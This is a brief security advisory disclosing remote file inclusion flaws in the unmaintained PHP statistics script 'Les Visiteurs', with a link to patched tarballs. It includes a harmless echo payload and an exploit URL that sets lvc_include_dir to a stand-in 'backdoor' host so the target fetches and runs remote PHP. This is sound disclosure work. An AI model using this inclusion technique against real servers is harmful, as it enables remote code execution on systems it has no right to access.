Les Visiteurs is a great statistics script written in php. It gives you some graphicals informations on visitors of your website.
This script was distributed by phpinfo.net but is no more maintained since a year.
In this version severals unprotected includes can be found in files:
It is possible to include a php file from a backdoor server, and execute it on the target's server. You just have to create on the backdoor srv these files: - lang/<lang>.inc.php - db/db_mysql.inc.php
fill one with something like: <? echo '<? echo "<br><br>included from backdoor server :p<br>"; ?>'; ?>
and call an url as: http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/
Because the script is not maintained and will not be patched, i make some tarballs with a patched version.
You will find it at this url: http://chezwam.net/main/publications/lesvisiteurs/
Matthieu Peschaud Epita - France